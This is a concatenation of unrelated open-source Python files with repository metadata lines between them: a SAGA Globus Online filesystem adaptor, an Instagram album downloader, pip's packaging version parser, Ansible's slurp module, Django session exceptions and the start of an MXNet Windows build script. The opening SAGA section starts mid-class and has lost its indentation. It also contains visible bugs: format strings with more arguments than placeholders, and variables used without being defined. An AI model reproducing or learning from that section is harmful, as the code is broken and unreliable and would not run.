_cpi_base = super (GODirectory, self)
_cpi_base.__init__ (api, adaptor)
# ----------------------------------------------------------------
#
def _is_valid (self) :
if not self.valid :
raise saga.IncorrectState ("this instance was closed or removed")
# ----------------------------------------------------------------
#
@SYNC_CALL
def init_instance (self, adaptor_state, url, flags, session) :
""" Directory instance constructor """
# FIXME: eval flags!
if flags == None :
flags = 0
self.orig = saga.Url (url) # deep copy
self.url = saga.Url (url) # deep copy
self.path = url.path # keep path separate
self.url.path = None
self.flags = flags
self.session = session
self.valid = False # will be set by initialize
self.initialize ()
return self.get_api ()
# ----------------------------------------------------------------
#
def initialize (self) :
# GO shell got started, found its prompt. Now, change
# to the initial (or later current) working directory.
self.shell = self._adaptor.get_go_shell (self.session)
self.ep = self._adaptor.get_go_endpoint (self.session, self.shell, self.url)
self.ep_str, self.ep_name, self.ep_url = \
self._adaptor.get_go_endpoint_ids (self.session, self.url)
ps = self.get_path_spec ()
if not self.ep :
raise saga.badparameter ("invalid dir '%s': %s" % (ps, out))
if self.flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, ps)
elif self.flags & saga.filesystem.CREATE :
self._adaptor.run_go_cmd (self.shell, "mkdir '%s'" % ps)
else :
# this is as good an existence test as we can manage...
self._adaptor.run_go_cmd (self.shell, "ls '%s'" % ps)
self._logger.debug ("initialized directory %s/%s" % (self.url, self.path))
self.valid = True
# ----------------------------------------------------------------
#
def finalize (self, kill=False) :
if kill and self.shell :
self.shell.finalize (True)
self.shell = None
self.valid = False
# ----------------------------------------------------------------
#
def get_path_spec (self, url=None, path=None) :
return self._adaptor.get_path_spec (session = self.session,
url = url,
path = path,
cwd_url = self.url,
cwd_path = self.path)
# ----------------------------------------------------------------
#
@SYNC_CALL
def open (self, url, flags) :
self._is_valid ()
adaptor_state = { "from_open" : True,
"url" : saga.Url (self.url), # deep copy
"path" : self.path}
if sumisc.url_is_relative (url) :
url = sumisc.url_make_absolute (self.get_url (), url)
return saga.filesystem.File (url=url, flags=flags, session=self.session,
_adaptor=self._adaptor, _adaptor_state=adaptor_state)
# ----------------------------------------------------------------
#
@SYNC_CALL
def open_dir (self, url, flags) :
self._is_valid ()
adaptor_state = { "from_open" : True,
"url" : saga.Url (self.url), # deep copy
"path" : self.path}
if sumisc.url_is_relative (url) :
url = sumisc.url_make_absolute (self.get_url (), url)
return saga.filesystem.Directory (url=url, flags=flags, session=self.session,
_adaptor=self._adaptor, _adaptor_state=adaptor_state)
# ----------------------------------------------------------------
#
@SYNC_CALL
def change_dir (self, tgt, flags) :
tgt_url = saga.Url (tgt)
# FIXME: attempt to get new EP
if not sumisc.url_is_compatible (self.url, tgt_url) :
raise saga.BadParameter ("target dir outside of namespace '%s': %s" \
% (self.url, tgt_url))
if sumisc.url_is_relative (tgt_url) :
self.path = tgt_url.path
self.orig.path = self.path
else :
self.orig = saga.Url (tgt_url)
self.url = tgt_url
self.path = self.url.path
self.url.path = None
self.initialize ()
self._logger.debug ("changed directory (%s)" % (tgt))
# ----------------------------------------------------------------
#
@SYNC_CALL
def close (self, timeout=None):
if timeout :
raise saga.BadParameter ("timeout for close not supported")
self.finalize (kill=True)
# ----------------------------------------------------------------
@SYNC_CALL
def get_url (self) :
self._is_valid ()
return saga.Url (self.orig) # deep copy
# ----------------------------------------------------------------
#
@SYNC_CALL
def list (self, npat, flags):
self._is_valid ()
npat_ps = self.get_path_spec (url=npat)
out, err = self._adaptor.run_go_cmd (self.shell, "ls '%s'" % (npat_ps))
lines = filter (None, out.split ("\n"))
self._logger.debug (lines)
self.entries = []
for line in lines :
self.entries.append (saga.Url (line.strip ()))
return self.entries
# ----------------------------------------------------------------
#
@SYNC_CALL
def copy_self (self, tgt, flags):
self._is_valid ()
return self.copy (src_in=None, tgt_in=tgt, flags=flags)
# ----------------------------------------------------------------
#
@SYNC_CALL
def copy (self, src_in, tgt_in, flags, _from_task=None):
self._is_valid ()
# FIXME: eval flags
src_ps = self.get_path_spec (url=src_in)
tgt_ps = self.get_path_spec (url=tgt_in)
cmd_flags = ""
if flags & saga.filesystem.RECURSIVE :
cmd_flags += "-r"
if flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, tgt_ps)
cmd = "scp %s -s 0 '%s' '%s'" % (cmd_flags, src_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd)
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def link_self (self, tgt, flags):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def link (self, src_in, tgt_in, flags, _from_task=None):
#
# self._is_valid ()
#
# ----------------------------------------------------------------
#
@SYNC_CALL
def move_self (self, tgt, flags):
return self.move (src_in=None, tgt_in=tgt, flags=flags)
# ----------------------------------------------------------------
#
@SYNC_CALL
def move (self, src_in, tgt_in, flags):
# if src and target are on the same endpoint, we might get away with an
# actual 'rename' command -- in all other cases (or if rename failed),
# we fake move as non-atomic copy/remove...
src_ps = self.get_path_spec (url=src_in)
tgt_ps = self.get_path_spec (url=tgt_in)
src_ep_str = src_ps.split (':', 1)[0]
tgt_ep_str = tgt_ps.split (':', 1)[0]
if src_ep_str == tgt_ep_str :
try :
self._adaptor.run_go_cmd (self.shell, "rename '%s' '%s'" % (src_ps, tgt_ps))
return
except :
self._logger.warn ("rename op failed -- retry as copy/remove")
# either the op spans endpoints, or the 'rename' op failed
self.copy (src_in, tgt_in, flags);
self.remove (src_in, flags);
# ----------------------------------------------------------------
#
@SYNC_CALL
def remove_self (self, flags):
self._is_valid ()
self.remove (self.url, flags)
        self.valid = False
# ----------------------------------------------------------------
#
@SYNC_CALL
def remove (self, tgt_in, flags):
self._is_valid ()
tgt_ps = self.get_path_spec (url=tgt_in)
cmd_flags = ""
if flags & saga.filesystem.RECURSIVE :
cmd_flags += "-r"
# oh this is just great... - a dir only gets removed (on some endpoints)
# if the trailing '/' is specified -- otherwise the op *silently fails*!
# Oh well, since we don't really (want to) know if the target is a dir
# or not, we remove both versions... :/
# FIXME
cmd = "rm %s -f '%s/'" % (cmd_flags, tgt_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd)
cmd = "rm %s -f '%s'" % (cmd_flags, tgt_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd, mode='ignore')
# ----------------------------------------------------------------
#
@SYNC_CALL
def make_dir (self, tgt_in, flags):
self._is_valid ()
tgt_ps = self.get_path_spec (url=tgt_in)
if flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, tgt_ps)
else :
cmd = "mkdir '%s'" % (cmd_flags, tgt_ps)
self._adaptor.run_go_cmd (self.shell, cmd)
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def get_size_self (self) :
#
# self._is_valid ()
#
# return self.get_size (self.url)
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def get_size (self, tgt_in) :
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_dir_self (self):
#
# self._is_valid ()
#
# return self.is_dir (self.url)
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_dir (self, tgt_in):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_entry_self (self):
#
# self._is_valid ()
#
# return self.is_entry (self.url)
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_entry (self, tgt_in):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_link_self (self):
#
# self._is_valid ()
#
# return self.is_link (self.url)
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_link (self, tgt_in):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_file_self (self):
#
# return self.is_entry_self ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_file (self, tgt_in):
#
# return self.is_entry (tgt_in)
#
#
###############################################################################
#
class GOFile (saga.adaptors.cpi.filesystem.File) :
""" Implements saga.adaptors.cpi.filesystem.File
"""
# ----------------------------------------------------------------
#
def __init__ (self, api, adaptor) :
_cpi_base = super (GOFile, self)
_cpi_base.__init__ (api, adaptor)
# ----------------------------------------------------------------
#
def _is_valid (self) :
if not self.valid :
raise saga.IncorrectState ("this instance was closed or removed")
# ----------------------------------------------------------------
#
@SYNC_CALL
def init_instance (self, adaptor_state, url, flags, session):
""" File instance constructor """
# FIXME: eval flags!
if flags == None :
flags = 0
self.orig = saga.Url (url) # deep copy
self.url = saga.Url (url) # deep copy
self.path = url.path # keep path separate
self.cwd = sumisc.url_get_dirname (self.url)
self.url.path = None
self.flags = flags
self.session = session
self.valid = False # will be set by initialize
self.initialize ()
return self.get_api ()
# ----------------------------------------------------------------
#
def initialize (self) :
# GO shell got started, found its prompt. Now, change
# to the initial (or later current) working directory.
self.shell = self._adaptor.get_go_shell (self.session)
self.ep = self._adaptor.get_go_endpoint (self.session, self.shell, self.url)
self.ep_str, self.ep_name, self.ep_url = \
self._adaptor.get_go_endpoint_ids (self.session, self.url)
ps = self.get_path_spec ()
cwd_ps = self.get_path_spec (path=self.cwd)
if not self.ep :
raise saga.badparameter ("invalid file '%s': %s" % (ps, out))
if self.flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, cwd_ps)
elif self.flags & saga.filesystem.CREATE :
self._logger.error ("CREATE not supported for files via globus online")
else :
# this is as good an existence test as we can manage...
self._adaptor.run_go_cmd (self.shell, "ls '%s'" % ps)
self._logger.debug ("initialized file %s/%s" % (self.url, self.path))
self.valid = True
# ----------------------------------------------------------------
#
def get_path_spec (self, url=None, path=None) :
return self._adaptor.get_path_spec (session = self.session,
url = url,
path = path,
cwd_url = self.url,
cwd_path = self.path)
# ----------------------------------------------------------------
#
def finalize (self, kill=False) :
if kill and self.shell :
self.shell.finalize (True)
self.shell = None
self.valid = False
# ----------------------------------------------------------------
#
@SYNC_CALL
def close (self, timeout=None):
if timeout :
raise saga.BadParameter ("timeout for close not supported")
self.finalize (kill=True)
# ----------------------------------------------------------------
#
@SYNC_CALL
def get_url (self):
self._is_valid ()
return saga.Url (self.orig) # deep copy
# ----------------------------------------------------------------
#
@SYNC_CALL
def copy_self (self, tgt_in, flags):
self._is_valid ()
# FIXME: eval flags
src_ps = self.get_path_spec ()
tgt_ps = self.get_path_spec (url=tgt_in)
if flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, tgt_ps)
cmd = "scp %s -s 0 '%s' '%s'" % (cmd_flags, src_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd)
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def link_self (self, tgt_in, flags, _from_task=None):
#
# self._is_valid ()
#
#
# ----------------------------------------------------------------
#
@SYNC_CALL
def move_self (self, tgt_in, flags):
# if src and target are on the same endpoint, we might get away with an
# actual 'rename' command -- in all other cases (or if rename failed),
# we fake move as non-atomic copy/remove...
src_ps = self.get_path_spec ()
tgt_ps = self.get_path_spec (url=tgt_in)
src_ep_str = src_ps.split (':', 1)[0]
tgt_ep_str = tgt_ps.split (':', 1)[0]
if src_ep_str == tgt_ep_str :
try :
self._adaptor.run_go_cmd (self.shell, "rename '%s' '%s'" % (src_ps, tgt_ps))
return
except :
self._logger.warn ("rename op failed -- retry as copy/remove")
# either the op spans endpoints, or the 'rename' op failed
        self.copy_self (tgt_in, flags)
        self.remove_self (flags)
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def read (self,size=None):
#
# self._is_valid ()
#
#
# ----------------------------------------------------------------
#
@SYNC_CALL
def remove_self (self, flags):
self._is_valid ()
tgt_ps = self.get_path_spec ()
cmd = "rm %s -f '%s'" % (cmd_flags, tgt_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd, mode='ignore')
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def get_size_self (self) :
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_dir_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_entry_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_link_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_file_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
|
4pr0n/rip
|
refs/heads/master
|
sites/site_instagram.py
|
1
|
#!/usr/bin/python
from basesite import basesite
from json import loads
from time import sleep
from os import path
"""
Downloads instagram albums
"""
class instagram(basesite):
""" Retrieves API key from local file """
def get_api_key(self):
api_path = path.join(path.dirname(__file__), 'instagram_api.key')
api_key = ''
if path.exists(api_path):
f = open(api_path, 'r')
api_key = f.read().replace('\n', '').strip()
f.close()
if api_key == '':
raise Exception('no instagram API key found at %s' % api_path)
return api_key
""" Parse/strip URL to acceptable format """
def sanitize_url(self, url):
if'instagram.com/' in url:
# Legit
pass
elif 'web.stagram.com/n/' in url:
			# Convert the web.stagram URL to its instagram.com equivalent
user = url[url.find('.com/n/')+len('.com/n/'):]
if '/' in user: user = user[:user.find('/')]
url = 'http://instagram.com/%s' % user
else:
raise Exception('')
if '?' in url: url = url[:url.find('?')]
if '#' in url: url = url[:url.find('#')]
while url.endswith('/'): url = url[:-1]
return url
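	# Illustrative example (hypothetical user): 'http://web.stagram.com/n/someuser/?foo'
	# sanitizes to 'http://instagram.com/someuser'.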
""" Discover directory path based on URL """
def get_dir(self, url):
user = url[url.rfind('/')+1:]
return 'instagram_%s' % user
def download(self):
self.init_dir()
client_id = self.get_api_key()
baseurl = '%s/media?client_id=%s' % (self.url, client_id)
url = baseurl
index = 0
while True:
self.debug('loading %s' % url)
r = self.web.get(url)
try: json = loads(r)
except:
self.wait_for_threads()
self.debug('invalid json response:\n%s' % r)
raise Exception('unable to parse json at %s' % url)
if not json['status'] == 'ok':
self.wait_for_threads()
self.log('status NOT OK: %s' % json['status'])
raise Exception('status not "ok": %s' % json['status'])
last_id = 0
for item in json['items']:
last_id = item['id']
for media_type in ['videos', 'images']:
if not media_type in item: continue
index += 1
media_url = item[media_type]['standard_resolution']['url']
self.download_image(media_url, index)
sleep(0.5)
break
if self.hit_image_limit(): break
if self.hit_image_limit(): break
if not json['more_available'] or last_id == 0: break
sleep(2)
url = '%s&max_id=%s' % (baseurl, last_id)
self.wait_for_threads()
|
abhikumar22/MYBLOG
|
refs/heads/master
|
blg/Lib/site-packages/pip/_vendor/packaging/version.py
|
1151
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import collections
import itertools
import re
from ._structures import Infinity
__all__ = [
"parse", "Version", "LegacyVersion", "InvalidVersion", "VERSION_PATTERN"
]
_Version = collections.namedtuple(
"_Version",
["epoch", "release", "dev", "pre", "post", "local"],
)
def parse(version):
"""
Parse the given version string and return either a :class:`Version` object
or a :class:`LegacyVersion` object depending on if the given version is
a valid PEP 440 version or a legacy version.
"""
try:
return Version(version)
except InvalidVersion:
return LegacyVersion(version)
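# Illustrative usage: parse("1.0.post1") returns a Version, while a string that is
# not PEP 440 compliant, e.g. parse("not.a.version"), falls back to a LegacyVersion.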
class InvalidVersion(ValueError):
"""
An invalid version was found, users should refer to PEP 440.
"""
class _BaseVersion(object):
def __hash__(self):
return hash(self._key)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
def _compare(self, other, method):
if not isinstance(other, _BaseVersion):
return NotImplemented
return method(self._key, other._key)
class LegacyVersion(_BaseVersion):
def __init__(self, version):
self._version = str(version)
self._key = _legacy_cmpkey(self._version)
def __str__(self):
return self._version
def __repr__(self):
return "<LegacyVersion({0})>".format(repr(str(self)))
@property
def public(self):
return self._version
@property
def base_version(self):
return self._version
@property
def local(self):
return None
@property
def is_prerelease(self):
return False
@property
def is_postrelease(self):
return False
_legacy_version_component_re = re.compile(
r"(\d+ | [a-z]+ | \.| -)", re.VERBOSE,
)
_legacy_version_replacement_map = {
"pre": "c", "preview": "c", "-": "final-", "rc": "c", "dev": "@",
}
def _parse_version_parts(s):
for part in _legacy_version_component_re.split(s):
part = _legacy_version_replacement_map.get(part, part)
if not part or part == ".":
continue
if part[:1] in "0123456789":
# pad for numeric comparison
yield part.zfill(8)
else:
yield "*" + part
# ensure that alpha/beta/candidate are before final
yield "*final"
def _legacy_cmpkey(version):
    # We hardcode an epoch of -1 here. A PEP 440 version can only have an epoch
# greater than or equal to 0. This will effectively put the LegacyVersion,
# which uses the defacto standard originally implemented by setuptools,
# as before all PEP 440 versions.
epoch = -1
    # This scheme is taken from pkg_resources.parse_version of setuptools prior to
    # its adoption of the packaging library.
parts = []
for part in _parse_version_parts(version.lower()):
if part.startswith("*"):
# remove "-" before a prerelease tag
if part < "*final":
while parts and parts[-1] == "*final-":
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == "00000000":
parts.pop()
parts.append(part)
parts = tuple(parts)
return epoch, parts
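# Illustrative example: _legacy_cmpkey("1.0") == (-1, ('00000001', '*final')); the
# hardcoded -1 epoch is what sorts every LegacyVersion before any PEP 440 Version.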
# Deliberately not anchored to the start and end of the string, to make it
# easier for 3rd party code to reuse
VERSION_PATTERN = r"""
v?
(?:
(?:(?P<epoch>[0-9]+)!)? # epoch
(?P<release>[0-9]+(?:\.[0-9]+)*) # release segment
(?P<pre> # pre-release
[-_\.]?
(?P<pre_l>(a|b|c|rc|alpha|beta|pre|preview))
[-_\.]?
(?P<pre_n>[0-9]+)?
)?
(?P<post> # post release
(?:-(?P<post_n1>[0-9]+))
|
(?:
[-_\.]?
(?P<post_l>post|rev|r)
[-_\.]?
(?P<post_n2>[0-9]+)?
)
)?
(?P<dev> # dev release
[-_\.]?
(?P<dev_l>dev)
[-_\.]?
(?P<dev_n>[0-9]+)?
)?
)
(?:\+(?P<local>[a-z0-9]+(?:[-_\.][a-z0-9]+)*))? # local version
"""
class Version(_BaseVersion):
_regex = re.compile(
r"^\s*" + VERSION_PATTERN + r"\s*$",
re.VERBOSE | re.IGNORECASE,
)
def __init__(self, version):
# Validate the version and parse it into pieces
match = self._regex.search(version)
if not match:
raise InvalidVersion("Invalid version: '{0}'".format(version))
# Store the parsed out pieces of the version
self._version = _Version(
epoch=int(match.group("epoch")) if match.group("epoch") else 0,
release=tuple(int(i) for i in match.group("release").split(".")),
pre=_parse_letter_version(
match.group("pre_l"),
match.group("pre_n"),
),
post=_parse_letter_version(
match.group("post_l"),
match.group("post_n1") or match.group("post_n2"),
),
dev=_parse_letter_version(
match.group("dev_l"),
match.group("dev_n"),
),
local=_parse_local_version(match.group("local")),
)
# Generate a key which will be used for sorting
self._key = _cmpkey(
self._version.epoch,
self._version.release,
self._version.pre,
self._version.post,
self._version.dev,
self._version.local,
)
def __repr__(self):
return "<Version({0})>".format(repr(str(self)))
def __str__(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{0}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
# Pre-release
if self._version.pre is not None:
parts.append("".join(str(x) for x in self._version.pre))
# Post-release
if self._version.post is not None:
parts.append(".post{0}".format(self._version.post[1]))
# Development release
if self._version.dev is not None:
parts.append(".dev{0}".format(self._version.dev[1]))
# Local version segment
if self._version.local is not None:
parts.append(
"+{0}".format(".".join(str(x) for x in self._version.local))
)
return "".join(parts)
@property
def public(self):
return str(self).split("+", 1)[0]
@property
def base_version(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{0}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
return "".join(parts)
@property
def local(self):
version_string = str(self)
if "+" in version_string:
return version_string.split("+", 1)[1]
@property
def is_prerelease(self):
return bool(self._version.dev or self._version.pre)
@property
def is_postrelease(self):
return bool(self._version.post)
def _parse_letter_version(letter, number):
if letter:
# We consider there to be an implicit 0 in a pre-release if there is
# not a numeral associated with it.
if number is None:
number = 0
# We normalize any letters to their lower case form
letter = letter.lower()
# We consider some words to be alternate spellings of other words and
# in those cases we want to normalize the spellings to our preferred
# spelling.
if letter == "alpha":
letter = "a"
elif letter == "beta":
letter = "b"
elif letter in ["c", "pre", "preview"]:
letter = "rc"
elif letter in ["rev", "r"]:
letter = "post"
return letter, int(number)
if not letter and number:
# We assume if we are given a number, but we are not given a letter
# then this is using the implicit post release syntax (e.g. 1.0-1)
letter = "post"
return letter, int(number)
_local_version_seperators = re.compile(r"[\._-]")
def _parse_local_version(local):
"""
Takes a string like abc.1.twelve and turns it into ("abc", 1, "twelve").
"""
if local is not None:
return tuple(
part.lower() if not part.isdigit() else int(part)
for part in _local_version_seperators.split(local)
)
def _cmpkey(epoch, release, pre, post, dev, local):
    # When we compare a release version, we want to compare it with all of the
    # trailing zeros removed. So we'll reverse the list, drop all the now
    # leading zeros until we come to something non-zero, then take the rest,
    # re-reverse it back into the correct order, and make it a tuple to use
    # as our sorting key.
release = tuple(
reversed(list(
itertools.dropwhile(
lambda x: x == 0,
reversed(release),
)
))
)
# We need to "trick" the sorting algorithm to put 1.0.dev0 before 1.0a0.
# We'll do this by abusing the pre segment, but we _only_ want to do this
# if there is not a pre or a post segment. If we have one of those then
# the normal sorting rules will handle this case correctly.
if pre is None and post is None and dev is not None:
pre = -Infinity
# Versions without a pre-release (except as noted above) should sort after
# those with one.
elif pre is None:
pre = Infinity
# Versions without a post segment should sort before those with one.
if post is None:
post = -Infinity
# Versions without a development segment should sort after those with one.
if dev is None:
dev = Infinity
if local is None:
# Versions without a local segment should sort before those with one.
local = -Infinity
else:
# Versions with a local segment need that segment parsed to implement
# the sorting rules in PEP440.
# - Alpha numeric segments sort before numeric segments
# - Alpha numeric segments sort lexicographically
# - Numeric segments sort numerically
# - Shorter versions sort before longer versions when the prefixes
# match exactly
local = tuple(
(i, "") if isinstance(i, int) else (-Infinity, i)
for i in local
)
return epoch, release, pre, post, dev, local
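# Illustrative ordering produced by these rules (per PEP 440):
#   Version("1.0.dev0") < Version("1.0a1") < Version("1.0rc1") < Version("1.0")
#   < Version("1.0+local") < Version("1.0.post1") < Version("1.1")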
|
ilya-epifanov/ansible-modules-core
|
refs/heads/devel
|
network/basics/slurp.py
|
134
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: slurp
version_added: historical
short_description: Slurps a file from remote nodes
description:
- This module works like M(fetch). It is used for fetching a base64-
encoded blob containing the data in a remote file.
options:
src:
description:
- The file on the remote system to fetch. This I(must) be a file, not a
directory.
required: true
default: null
aliases: []
notes:
- "See also: M(fetch)"
requirements: []
author:
- "Ansible Core Team"
- "Michael DeHaan"
'''
EXAMPLES = '''
ansible host -m slurp -a 'src=/tmp/xx'
host | success >> {
"content": "aGVsbG8gQW5zaWJsZSB3b3JsZAo=",
"encoding": "base64"
}
'''
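# A registered slurp result is typically decoded on the control node with the
# b64decode filter, e.g. (illustrative snippet, 'slurped' is an assumed register name):
#   - debug: msg="{{ slurped.content | b64decode }}"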
import base64
def main():
module = AnsibleModule(
argument_spec = dict(
src = dict(required=True, aliases=['path']),
),
supports_check_mode=True
)
source = os.path.expanduser(module.params['src'])
if not os.path.exists(source):
module.fail_json(msg="file not found: %s" % source)
if not os.access(source, os.R_OK):
module.fail_json(msg="file is not readable: %s" % source)
data = base64.b64encode(file(source).read())
module.exit_json(content=data, source=source, encoding='base64')
# import module snippets
from ansible.module_utils.basic import *
main()
|
rooshilp/CMPUT410Lab6
|
refs/heads/master
|
virt_env/virt1/lib/python2.7/site-packages/django/contrib/sessions/exceptions.py
|
931
|
from django.core.exceptions import SuspiciousOperation
class InvalidSessionKey(SuspiciousOperation):
"""Invalid characters in session key"""
pass
class SuspiciousSession(SuspiciousOperation):
"""The session may be tampered with"""
pass
|
ptrendx/mxnet
|
refs/heads/master
|
ci/build_windows.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""User friendly / multi platform builder script"""
import argparse
import datetime
import glob
import logging
import os
import platform
import shutil
import sys
import time
from distutils.dir_util import copy_tree
from enum import Enum
from subprocess import check_call
from util import *
KNOWN_VCVARS = {
'VS 2015': r'C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\vcvarsx86_amd64.bat',
'VS 2017': r'C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build\vcvarsx86_amd64.bat'
}
class BuildFlavour(Enum):
WIN_CPU = 'WIN_CPU'
WIN_CPU_MKLDNN = 'WIN_CPU_MKLDNN'
WIN_GPU = 'WIN_GPU'
WIN_GPU_MKLDNN = 'WIN_GPU_MKLDNN'
CMAKE_FLAGS = {
'WIN_CPU': ('-DUSE_CUDA=0 '
'-DUSE_CUDNN=0 '
'-DUSE_NVRTC=0 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DBUILD_CPP_EXAMPLES=1 '
'-DUSE_MKL_IF_AVAILABLE=0 '
'-DCMAKE_BUILD_TYPE=Release')
, 'WIN_CPU_MKLDNN': ('-DUSE_CUDA=0 '
'-DUSE_CUDNN=0 '
'-DUSE_NVRTC=0 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DUSE_MKL_IF_AVAILABLE=1 '
'-DCMAKE_BUILD_TYPE=Release')
, 'WIN_GPU': ('-DUSE_CUDA=1 '
'-DUSE_CUDNN=1 '
'-DUSE_NVRTC=1 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DCUDA_ARCH_NAME=Manual '
'-DCUDA_ARCH_BIN=52 '
'-DCUDA_ARCH_PTX=52 '
'-DCMAKE_CXX_FLAGS="/FS /MD /O2 /Ob2" '
'-DUSE_MKL_IF_AVAILABLE=0 '
'-DCMAKE_BUILD_TYPE=Release')
, 'WIN_GPU_MKLDNN': ('-DUSE_CUDA=1 '
'-DUSE_CUDNN=1 '
'-DUSE_NVRTC=1 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DCUDA_ARCH_NAME=Manual '
'-DCUDA_ARCH_BIN=52 '
'-DCUDA_ARCH_PTX=52 '
'-DUSE_MKLDNN=1 '
'-DCMAKE_CXX_FLAGS="/FS /MD /O2 /Ob2" '
'-DCMAKE_BUILD_TYPE=Release')
}
def windows_build(args):
logging.info("Using vcvars environment:\n{}".format(args.vcvars))
path = args.output
os.makedirs(path, exist_ok=True)
mxnet_root = get_mxnet_root()
logging.info("Found MXNet root: {}".format(mxnet_root))
with remember_cwd():
os.chdir(path)
cmd = "\"{}\" && cmake -G \"NMake Makefiles JOM\" {} {}".format(args.vcvars,
CMAKE_FLAGS[args.flavour],
mxnet_root)
logging.info("Generating project with CMake:\n{}".format(cmd))
check_call(cmd, shell=True)
cmd = "\"{}\" && jom".format(args.vcvars)
logging.info("Building with jom:\n{}".format(cmd))
t0 = int(time.time())
check_call(cmd, shell=True)
logging.info("Build flavour: {} complete in directory: \"{}\"".format(args.flavour, os.path.abspath(path)))
logging.info("Build took {}".format(datetime.timedelta(seconds=int(time.time() - t0))))
windows_package(args)
def windows_package(args):
pkgfile = 'windows_package.7z'
pkgdir = os.path.abspath('windows_package')
logging.info("Packaging libraries and headers in package: %s", pkgfile)
j = os.path.join
pkgdir_lib = os.path.abspath(j(pkgdir, 'lib'))
with remember_cwd():
os.chdir(args.output)
logging.info("Looking for static libraries and dlls in: \"%s", os.getcwd())
